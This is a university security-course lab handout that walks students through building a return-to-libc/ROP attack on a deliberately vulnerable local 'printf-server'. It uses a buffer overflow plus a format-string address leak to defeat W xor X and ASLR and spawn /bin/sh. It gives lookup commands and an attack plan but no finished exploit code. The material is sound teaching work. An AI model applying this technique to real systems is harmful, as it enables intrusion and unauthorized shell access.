University of Minnesota
Development of Secure Software Systems
index.php

CSci 4271 Lab 14a

In this week's lab you'll pretend to be an attacker one last time. We haven't gone in too much depth in this course about defenses and counter-attack techniques, but this lab will go one step further than previous labs and projects (you might say removing a simplification) by letting you create a more sophisticated attack that works even in the presence of W xor X and ASLR.

These instructions are written under the assumption you're using one of the CSE Labs Ubuntu 22.04 machines like the 1-262 lab machines. Because the lab is about low-level attacks, differences in how the victim program is compiled will affect what attacks are possible. For instance, if you want to work on the lab remotely, you're better off using Vole-FX3 than the old 20.04-based Vole. (An older version of the lab was based on 20.04, but we haven't rechecked this version there.)

Reconnaissance of the victim

The victim program for this week's attack is a simple server named printf-server; as the name suggests, it provides the service of formatting integers using the C library printf function. You can copy and compile your own version like this:

cp /web/classes/Spring-2024/csci4271/labs/14a/printf-server.c .
gcc-11 -Og -no-pie -fno-stack-protector -Wall -g printf-server.c -o printf-server

The option -fno-stack-protector disables stack canaries; we've disabled that defense because today's attack is still based on overwriting a return address. -Og is a modest optimization level that uses registers and removes unused code. (Compared to some other victim programs that we compiled without any optimization, we had to add some extra code in this program to make sure the vulnerable operations were compiled in the way we wanted and not optimized away.)

Take a moment to look over the source code for the program and try giving it some benign commands. Each command is a single line starting with a capital letter. The most important commands for the basic functionality are F to set a printf format, N to set a number, and P to print it.

The command O has a buffer overflow. If you give a long line starting with O, the program will crash. As we did for previous programs vulnerable to a buffer overflow, use commands inside GDB to figure out where the return address of the overflow function is stored relative to the overflowed buffer buf.

As you might have guessed from the printf functionality, this program also has a format string vulnerability. But for the purposes of this lab, we're only going to use it for information disclosure, not with %n.

Recall that Linux C binaries are usually dynamically linked with a system library, conventionally called the C library or libc, which implements standard library functions, system calls, and some other commonly used functions. You will need to work more closely with this library today. You can list the libraries that a program dynamically links with using the command ldd, and then use commands like objdump or nm on it. The ldd command lists the shared libraries that a program uses; for each on its prints the full path to the library and its base address.

ldd ./printf-server
objdump -d /lib/x86_64-linux-gnu/libc.so.6 | less

Non-ASLR return-to-libc attack

For the first step of attack development, we'll build an attack that works when ASLR is disabled. So for this part of the lab use setarch -R when you run the victim or for your whole shell.

Because the W xor X protection is enabled, we can't inject any shellcode in this program: we need to achieve the attacker's functionality using code already in the program's address space. Specifically we suggest today you do what's called a return-to-libc attack, a simple version of ROP where you call an entire function from the standard library. In particular we'll take the classic choice of system as the library function to call, since it already has the functionality of starting an external program. Also classically a convenient program for an attack to start is a shell, and the library includes a string containing the path to the standard shell /bin/sh, since it's already part of the implementation of system. So the functionality we're injecting is going to be like the C code:

system("/bin/sh"); exit(anything);

The call to exit isn't actually needed for the attack, but it's convenient to terminate the attack so you can distinguish between things going wrong before the attack and after. We don't care about the value of the argument to exit, but we do care about the argument to system.

The pieces of code and data we need for the attack are all kept in the library that is called libc on Unix systems. Even though we have randomization turned off for now, the OS still loads the library at an address of the OS's choosing, so you'll need to keep in mind how the addresses are changed based on where the library is loaded; once we turn on ASLR the locations will also be different every time the program runs.

As a preliminary step, try making a return-to-libc attack that just calls exit, which is particularly easy because you don't have to set up the argument. Basically your overflow just needs to overwrite the return address of overflow to be the entry point of exit. To see how the address mapping happens, try two ways of finding the location of exit. First, run the server under GDB, and after the program is running and stopped at a breakpoint, look at the results of p exit. Second, look at the output of the this command (based on the C library location we found earlier):

ldd ./printf-server
nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep ' exit'

The nm command prints symbol table information about an executable or library (here with -D to look at the dynamic symbols of a shared library). Because shared libraries are designed from the beginning to be loaded at different addresses, what's stored in the binary and printed by nm is just a relative address. You should be able to see that the sum of these two numbers matches the address you saw from GDB.

Verify that you can overflow the buffer and cause exit to be executed. Note that if exit runs correctly, the program will stop without crashing or printing anything.

Adding a bit of ROP

The classic version of return-to-libc also put the arguments to the library function in the stack overflow, because that was the calling convention for Linux/x86-32. For our attack against a 64-bit binary, that won't work because the argument to system needs to be supplied in the register %rdi. So for this part of the attack we'd need a very simple version of the idea of a gadget from ROP: we need to find code that loads a value from the stack into %rdi and then returns. That will be the first "function" that the attack returns to, and then when that function returns it will continue with other return addresses on the stack. As the easiest version of this task, you'll see there's a function named useful_gadget in the victim program that is useful for this purpose. If you're feeling more ambitious, this gadget also exists in the C library, though there's an extra trick needed to find it there.

The two other obvious pieces you need in your attack are the address of the system function and the address of a copy of the string /bin/sh. You can find the address of system just like we did for exit before. The strings program can be used to find printable strings in a binary, in particular try this command:

strings -tx -a /lib/x86_64-linux-gnu/libc.so.6 | fgrep /bin/sh

One other trick you'll need is related to the fact that some x86-64 code depends on the stack pointer being 16-byte aligned, and not just 8-byte aligned. Some library functions will crash if you call them the stack location at an odd multiple of 8. To fix this you can just pad your return-oriented program with a the address of a gadget that doesn't do anything at all, and just returns right away. This kind of gadget is even easier to find.

Your full overflow is going to have a lot of binary data and null bytes in it, so it won't be convenient to type it in on the terminal. You'll want to do something like using a scripting language with a pack command, or write the attack in a hex editor. Even though it's binary data, printf-server still terminates each command with a newline, so be sure it ends with that. Also, after you've started a shell, you'll want to give it another command, but if you're redirecting the input from a file or a pipe you won't automatically get a prompt back. For a simple test you can just put the command you want to give to the shell after the command to printf-server, since printf-server doesn't read ahead. For instance xcalc and a newline to start a calculator.

Bypassing ASLR

Now let's generalize the attack so that it works even in the presence of ASLR. All the libc-based addresses you're using will now change every time you run the victim, so you can't hard code them. But luckily because the program also has a format string vulnerability, you can get information that will let you figure out the library address from the program.

You may notice that the main function has a function pointer variable that is initialized to the location of the printf function in the C library. Using a format string with %lx to figure out how to leak that value. Notice that even under ASLR, the starting address of the C library always ends in 0x000, which makes it easier to see which address is which.

You can first try doing the location-sensitive attack in a manual way by recomputing the addresses as needed; you may still need a small script or program to supply the attack at the right time. But a more sophisticated approach to embed your attack into a program itself that interacts with the victim program. You can start from a template we've provided:

cp /web/classes/Spring-2024/csci4271/labs/14a/attack-template.c attack.c

The template already provides the code to start up the vulnerable server as a child process, and to send commands and receive data back from it. But you'll need to put the pieces together by implementing the function attack.